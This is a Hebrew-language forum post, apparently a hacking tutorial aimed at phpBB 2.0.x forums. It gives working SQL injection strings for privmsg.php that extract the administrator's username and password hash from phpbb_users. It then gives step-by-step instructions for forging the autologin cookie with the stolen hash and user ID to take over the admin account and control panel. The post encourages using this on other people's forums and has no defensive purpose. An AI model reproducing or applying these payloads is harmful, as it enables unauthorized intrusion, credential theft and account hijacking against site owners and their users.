|
עכשיו אתם בטח שואלים את עצמכם איך אני מגלה את הגירסא של הפורום(אם אתם לא אז תדלגו על זה) אז הנה: אתם יורדים הכי למטה בפורום ואז רשום איזה פורום זה ואיזה גרסא..
אז אתם צריכים קודם להירשם לפורום ולהיות מחוברים
עכשיו נגיד שזה הכתובת של הפורום:
http://abcde.co.il/forum/index.php
אז רק את החלק של ה- index.php תחליפו בקוד הזה(רק אם הפורום עובד על 2.0.6 או 2.0.1 או 2.0.3):
קוד:
privmsg.php?folder=savebox&mode=read&p=2993&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=1 LIMIT 1/*
ואם זה פורום שעובד על גרסא אחרת למשל 2.0.4 תרשמו את הקוד הזה:
קוד: privmsg.php?folder=savebox&mode=read&p=2993&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=1 LIMIT 1/*
זהו (דבר ראשון בשביל לא להיות ליימר זה להבין..) מה שעשינו פה בעצם זה גנבנו את ה hash ניצלנו את באג ב sql (ה hash זה סיסמא מוצפנת) תסתכלו טוב בקוד תראו שיש שם "user_id=1" זה איפשהו בסוףאת ה"id=1" אתם יכולים להחליף בכל מספר זה המספר של המשתמש "1" זה בדרך כלל המנהל הראשי זה שבנה את הפורום יפה עכישו במידה וזה לא הראה לכם את ההאש, והגיעה לכם להודעות הפרטיות וכדומה.. זה סימן שחסמו את הגישה הזאת אז תוותרו על הפורום הזה אם זה לא חסום אתם תגיעו לדף ותראו שם סיסמא ארוכה זאתי הסיסמא המוצפנת שלנו עכשיו אתם יכולים להגיד לעצמכם "יש לי פורום חדש" אחרי שעשיתם את כל זה.. תעתיקו את הסיסמא המוצפנת וזיכרו את מספר המשתמש(כמו שאמרתי בדרך כלל תרצו את "1" שיהיה לכם גישה לניהול מלא)וצאו מהדפדפן(מהפורום) עד פה הכל ברור??כל הכבוד.. מפה לכו לתיקיית הקוקיז בווינסוד xp היא נמצאת ב C:Documents and SettingsuserCookies . או Local SettingsTemporary Internet Filesשם המחשב שלכםC:Documents and Settings חפשו שם את הקוקיז של אותו פורום,יופי אחרי שמצאתם תחפשו שורה כזאת בערך
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22*HASH*%22%3Bs%3A6%3A%
ושורה כזאת בערך
22userid%22%3Bi%3A*USERNUMBER*%3B%7D
איפה שאתם רואים את ה *HASH* זה הוא הסיסמא המוצפנת שגנבתם,אז החליפו אותה בהאש האמיתי . (זה שראיתם בפורום) ואיפה שאתם רואים את ה *USERNUMBER* החליפו בזה את מספר המשתמש שאתם רוצים לפרוץ לו . ועוד דבר כדי שתקבלו את לוח הבקרה למנהלים(תשלימו את פריצתכם) . אם מספר המשתמש שלכם הוא בעל 4 ספרות כגון 1253 ומספר האדמין או כל משתמש אחר שבחרתם לפרוץ לו הוא בעל ספרה אחת או שתיים או כל דבר אחר שהוא לא כמו שלכם לדוגמא 1 אז תעשו 0001 מכיוון ששלכם 4 ספרות ושלו ספרה אחת אז אתם צריכים להשוות..(ככה תעשו בקוקיז) . זהו
|